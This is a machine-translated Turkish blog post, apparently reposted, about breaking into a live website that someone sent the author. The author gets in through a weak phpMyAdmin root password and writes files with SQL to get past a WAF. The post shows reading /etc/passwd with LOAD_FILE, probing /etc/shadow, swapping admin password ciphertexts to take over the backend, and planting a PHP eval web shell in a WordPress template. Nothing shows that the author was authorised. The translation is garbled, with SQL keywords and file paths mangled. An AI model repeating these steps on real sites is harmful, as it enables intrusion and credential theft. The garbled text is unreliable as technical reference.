Basit giriş ve zahmetli atış - belirli bir istasyona girme sürecini hatırlayın
#Giriş
Dün gece PD yardım için bana bir web sitesi gönderdi. Bulduğu giriş basitti, phpMyAdmin için zayıf bir parolaydı. Bu sefer penetrasyon süreci aslında çok basit olabilir, çünkü wp- * phpMyAdmin'in arka planında bulundu ve bu sitenin sayfasını çevirdiğimde WordPress dizini de bulundu.Şu anda, kabuğunu WordPress'in arka planında almayı deneyebilirsiniz, ancak ruhu içinde Daha fazla atma ilkesi, bu makale var.
#phpMyAdmin
Kökten sonra: kök arka planda oturum açar, bu Jiangzi'dir:
Geleneksel fikir, SQL deyimlerini yürütmek, web sitesi dizinine bir Truva atı sözcüğü yazmak ve ardından kesiciyi kullanmaktır.
Kök otoritenin düşürülüp düşürülmediğine, yani dosya yazma yetkisine sahip olup olmadığına alışılmış bir şekilde baktılar.
Resimde gösterildiği gibi
Ve / tmp dizinine yazıp yazamayacağını alışkanlık olarak test edin
OUTFILE '/tmp/1.txt' İÇİNDE 1 SEÇİN
Şu anda bağlantı sıfırlandı - *
WAF'ın yakaladığı tahmin ediliyor, bu yüzden durdurmayı atlayıp geçemeyeceğimi görmenin birkaç yolunu düşündüm - *
Örneğin, yorumlar ekleyin, büyük harf kullanın. Ama hiçbir şey başarılı olamadı, bu yüzden SQL enjeksiyon korumasını atlamayı düşünüyordum, INTO yerine başka işlevler olabilir mi?
OUTFILE, burada akla gelen INTO DUMPFILE olmalı, ancak başarıyla atlandı.
O zamanki test ifadesi şöyleydi:
"/Tmp/1.txt" DÖKÜM DOSYASINA 1 SEÇİN
Başarısız oldu ve komut istemi hatası 1.txt Zaten var Bu, yukarıdaki INTO OUTFILE'ı kullandığımızda ifadenin başarıyla yürütüldüğünü ve sonraki doğrulamadan sonra gerçekten yürütüldüğünü gösterebilir. Bu nedenle, INTO OUTFIE gibi yasaklanmış işlevlerin yürütülmesinin sayfaya geri döneceğini, ancak ifadenin yine de yürütüleceğini buldum. Bu aynı zamanda aşağıdaki operasyonların temelini oluşturur.
Sonra, web sitesinin kök dizinini bulmanın bir yolunu bulmaya çalışıyordum.Ana web sitesine baktım ve herhangi bir bilgi (hata raporu gibi) yoktu.Ayrıca mysql işletim ortamına da baktım ve aşağıdaki dizinleri buldum:
/ var / lib / mysql /
/ usr /
PhpStudy veya LAMP gibi entegre paketlerin kurulum izleri gibi yararlı bilgiler yoktur.
Bu nedenle, şu anki fikir dizini tahmin etmektir Başarısızlıkla hatırlayabildiğim yaygın olarak kullanılan birkaç tanesini denedim ve bir Fuzz sözlüğü aramaya başladım. . .
Yemek aradıktan ve bulamadıktan sonra, sqlmap'in -os-shell işlevinin dizini otomatik olarak tahmin etme seçeneği olacağını hatırladım, bu yüzden sqlmap'in dizin sözlüğüne bakmak istedim.
Dosyayı açtıktan sonra zayıf bir sözlük bulundu
OS.LINUX: ("/ var / www", "/ usr / local / apache", "/ usr / local / apache2", "/ usr / local / www / apache22",
"/ Usr / local / www / apache24", "/ usr / local / httpd", "/ var / www / nginx-default", "/ srv / www",
"/ Var / www /% TARGET%", "/ var / www / vhosts /% TARGET%", "/ var / www / virtual /% TARGET%",
"/ Var / www / clients / vhosts /% TARGET%", "/ var / www / clients / virtual /% TARGET%"),
Görünüşe göre gelecekte daha fazla kök dizin biriktireceğiz, bunları buraya yazın - - *
Yukarıdakilerin hepsini doğru tahmin etmeden denedim.
Şimdi yapılandırma dosyasını okumak istiyorum - *
Her zamanki gibi önce / etc / passwd'yi okuyun
LOAD_FILE, SQL çalıştırılırken de filtrelendiğinden ve sonuç döndürmediğinden, bir tablo oluşturmaya ve bir LONGTEXT türü alan INSERT LOAD_FILE ('/ etc / passwd') dosya içeriği eklemeye çalıştım (bunun temeli yukarıda belirlediğimiz , SQL ifadesi yürütülecektir)
Bu nedenle şunu çalıştırın:
TABLO OLUŞTUR testi (
id int (4) BOŞ DEĞİL BİRİNCİL ANAHTAR AUTO_INCREMENT,
LONGTEXT NOT NULL);
Burada bir çukurla karşılaştım. MySQL'e çok aşina olduğum için, okunan alan adının neden olması gerekiyor "ve daha önce alıntı yapmadığım halde hataları bildirmeye devam ettim ... Okumak rezerve edilmiş bir karakter olabilir mi?
Tablo başarıyla oluşturulduktan sonra çalıştır
test (id, "oku") değerlerini ("1", load_file ("/ etc / passwd")) içine ekleyin;
Başarılı bağlantı sıfırlandı - *
Ama yine de idam edildi
Ancak / etc / shadow gibi diğer dosyaları okumak için birkaç tane eklemeye devam edin, tümü bağlantının sıfırlandığını (dosya var), ancak boş olduğunu (dosyayı okuma izni yok) döndürür
Atma ilkesine uygun olarak, Linux yapılandırma dosyası Fuzz sözlüğünü çalıştırmak için BurpSuite'i kullanmanız yeterlidir.
Wooyun Wiki ile ilgili bir makalede yerel Fuzz dizini olmadığı için, bu sadece bir koleksiyon, bu yüzden başlığa bir göz attım ve bir anlık görüntüsünü aldım ve kopyaladım - *
Sonra bir senaryo yazdım ve ön alana gittim
fr olarak açık ("C: \ Kullanıcılar \ *** \ Masaüstü \ yol.txt", 'r') ile açın ("C: \ Kullanıcılar \ *** \ Masaüstü \ b .txt , 'w') fw olarak:
fr.readlines () satır için:
fw.write (line.lstrip ())
Sonra Burp, INSERT ifadesini çalıştıran paketi yakalar.
Sonuçta, bir Yanıt varsa, dosya mevcut değildir ve SQL ifadesi yürütüldüğünde bir hata bildirilir.Yanıt yoksa, dosyanın var olduğu ve başka bir şey olmadığı belirlenir. Düşündüğüm gibi test masasına yerleştirilmedi. Nedenini bilmiyorum (Tekrarlayıcıda kimliği birden çok kez değiştirerek eklenebilir, ancak Inturder'ın neden yapamadığını bilmiyorum), herhangi bir usta bilir lütfen bana cevap verin-- *
Passwd haricinde mevcut yapılandırma dosyalarını manuel olarak okuyun, okuma izni yoktur - - *
Buraya bir nokta daha eklememe izin verin.Bir dizinin var olup olmadığını gözetlerken, onu INTO DUMPFILE ile dışa aktarabilir ve geri dönebilirsiniz.
Hata kodu: 2 Dizin mevcut değil
Hata kodu: 13 var ancak okuma izni yok
Dolayısıyla, / var / www / html'nin var olduğu bulunabilir ve bunun kök dizin olduğunu tahmin etmek doğaldır. . . Bununla birlikte, web sitesinin yapısına göre, kök dizine ait olması gereken bir klasöre yazarken, dizinin olmadığını da sorar, bu nedenle bu web sitesinin kök dizini değildir - * pit--
PhpMyAdmin'de bir master veya kabuk almanın bir yolu varsa, lütfen bana aşağıda cevap verin.
# Backstage Shell'i al
Web sitesinin arka planını bulmak kolay. Ana sayfada yazıyor, ancak veritabanındaki yönetici şifresine baktığımda kendimi şaşkın hissediyorum
Bu, sizin yazdığınız şifreleme işlemiyle mi şifreleniyor? Herhangi bir usta bunun hangi şifreleme yöntemi olduğunu biliyor mu? Lütfen bana öğret ...
Aşağıdaki şifreli metinler araştırma amaçlıdır:
C3tQcFAxXmEAIgI / A30OMldnA2FXZw ==
A3AEP1Y2DjwOMw ==
B35TZQB1
Uz9QalcnXGxUaw ==
UDRTdAZuWmcDIgdlUG4OMg ==
AjMFZFFnCGAGYgRh
Görünüşe göre oturum açma yöneticisi için bir çözüm yok, ancak web sitesinde bir kayıt girişi var. . Bir hesabı başarıyla kaydettikten sonra, veritabanında şifrelenmiş şifreli metni bulun, belirli bir yöneticinin şifreli metnini değiştirin ve arka planda başarıyla oturum açın (burada gösterilmemiştir)
Bunların arasında, sıradan üyelerin arka planında rastgele kullanıcı bilgilerinin geçişini sağlayan bir arayüz vardır - *
Arka planda oturum açın
Kabuğu almak için yükleme noktası ve kabuğun çeşitli duruşları başarısız oldu. . .
#WordPress
Bunu web sitesi ana sayfasında buldum
WordPress'in var olduğu doğrulanabilir
WordPress şifresinin tuz şifrelemesi olmasına ve çözülememesine rağmen, bir kullanıcının şifresini doğrudan md5 (şifre) olarak değiştirebilir ve doğrudan değiştirebilirsiniz.Oturum açtıktan sonra, şifre otomatik olarak WP şifreli şifre olarak değiştirilecektir.
Bu nedenle, arka planda oturum açtıktan sonra, şablon eklemek genel bir fikirdir
Ancak helikopter bağlandığında bir sorun çıktı ve WAF tarafından engellendiği tahmin edildi.
< ? php @eval ($ _ POST); echo 'whoami`; echo' test ';? >
Test sonuçlarında gösterildiği gibi
Bu yüzden WAF'ı başarıyla atlayarak hafife alınan şifreli bir cümleyi geçtim
#Conclusion
Zaten biraz daha uzun olan alan ve zaman sorunları nedeniyle intranet üzerinde daha fazla araştırma yapılmadı. Japonya'da uzun sürecek.
* Kaynak: 90sn Mottoin düzenlendi ve yayınlandıOrijinal makale, yazar: Moto, http: //www.mottoin.com/article/web/85636.html adresinden yeniden üretilmiştir.
